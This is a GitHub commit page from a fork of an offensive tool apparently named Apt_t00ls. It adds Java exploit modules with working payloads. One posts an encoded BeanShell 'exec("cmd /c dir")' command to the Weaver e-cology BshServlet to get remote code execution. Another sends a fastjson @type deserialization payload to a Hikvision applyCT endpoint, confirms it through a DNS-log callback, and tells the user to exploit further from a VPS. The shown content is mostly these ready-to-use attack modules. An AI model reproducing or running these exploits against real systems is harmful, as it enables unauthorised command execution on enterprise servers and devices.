forked from White-hua/Apt_t00ls
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
White-hua
committed
Oct 3, 2022
1 parent
476fbe3
commit 81bce57
Showing
32 changed files
with
261 additions
and
48 deletions.
There are no files selected for viewing
Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
package Exp.OA.weaveroa; | ||
|
||
import Utilss.HttpTools; | ||
import Utilss.Response; | ||
import core.Exploitlnterface; | ||
import javafx.scene.control.TextArea; | ||
|
||
import java.util.HashMap; | ||
|
||
public class weaveroa_BshServlet implements Exploitlnterface { | ||
@Override | ||
public Boolean checkVul(String url, TextArea textArea) { | ||
Boolean att = att(url,textArea); | ||
return att; | ||
} | ||
|
||
@Override | ||
public Boolean getshell(String url, TextArea textArea) { | ||
textArea.appendText("\n 该漏洞已直接执行系统命令,无需getshell"); | ||
return false; | ||
} | ||
|
||
private Boolean att(String url,TextArea textArea){ | ||
Response response = HttpTools.get(url + "/weaver/bsh.servlet.BshServlet/", new HashMap<String, String>(), "utf-8"); | ||
if(response.getCode() == 200 && response.getText().contains("BeanShell Test Servlet")){ | ||
textArea.appendText("\n 漏洞存在 开始测试payload"); | ||
|
||
Response post = HttpTools.post(url + "/weaver/bsh.servlet.BshServlet/", "bsh.script=ex%5Cu0065c%28%22cmd+%2Fc+dir%22%29%3B" | ||
, new HashMap<String, String>(),"utf-8"); | ||
if(post.getCode() == 200 && post.getText().contains("BeanShell Test Servlet")){ | ||
textArea.appendText("\n ex\\u0065c(\"cmd /c dir\"); 可用"); | ||
return true; | ||
}else { | ||
textArea.appendText("\n payload未找到 请尝试手动绕过"); | ||
return true; | ||
} | ||
|
||
}else { | ||
textArea.appendText("\n e-cology BshServlet-RCE-漏洞不存在 (出现误报请联系作者)"); | ||
return false; | ||
} | ||
} | ||
} |
65 changes: 65 additions & 0 deletions
65
src/main/java/Exp/OA/weaveroa/weaveroa_WorkflowServiceXml.java
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
48 changes: 48 additions & 0 deletions
48
src/main/java/Exp/equipment/HIKVISION/hik_applyCT_fastjson.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
package Exp.equipment.HIKVISION; | ||
|
||
import Utilss.HttpTools; | ||
import Utilss.Response; | ||
import Utilss.shell; | ||
import core.Exploitlnterface; | ||
import javafx.scene.control.TextArea; | ||
|
||
import java.util.HashMap; | ||
|
||
public class hik_applyCT_fastjson implements Exploitlnterface { | ||
@Override | ||
public Boolean checkVul(String url, TextArea textArea) { | ||
textArea.appendText("\n该漏洞使用dnslog检测 发包后延时5秒查看结果 测试时间略长(10s左右)"); | ||
Boolean att = att(url, textArea); | ||
return att; | ||
} | ||
|
||
@Override | ||
public Boolean getshell(String url, TextArea textArea) { | ||
return false; | ||
} | ||
|
||
private Boolean att(String url,TextArea textArea){ | ||
HashMap<String, String> head = new HashMap<>(); | ||
head.put("Content-Type", "application/json"); | ||
Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8"); | ||
int dns_1 = dns_le1.getText().length(); | ||
|
||
String pay_1 = "{\"a\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",{\"@type\":\"java.net.URL\",\"val\":\"" + | ||
shell.readFile(shell.dnspath) + "\"}}\"\"}"; | ||
Response post = HttpTools.post(url + "/bic/ssoService/v1/applyCT", pay_1, head, "utf-8"); | ||
|
||
try { Thread.sleep (5000) ; | ||
} catch (Exception ie){} | ||
|
||
Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8"); | ||
int dns_2 = dns_le2.getText().length(); | ||
|
||
if(dns_2 > dns_1){ | ||
textArea.appendText("\n漏洞存在-收到dnslog回显,请使用VPS自行利用"); | ||
return true; | ||
}else { | ||
textArea.appendText("\n综合安防_applyCT_fastjson-RCE-漏洞不存在 (出现误报请联系作者)"); | ||
return false; | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.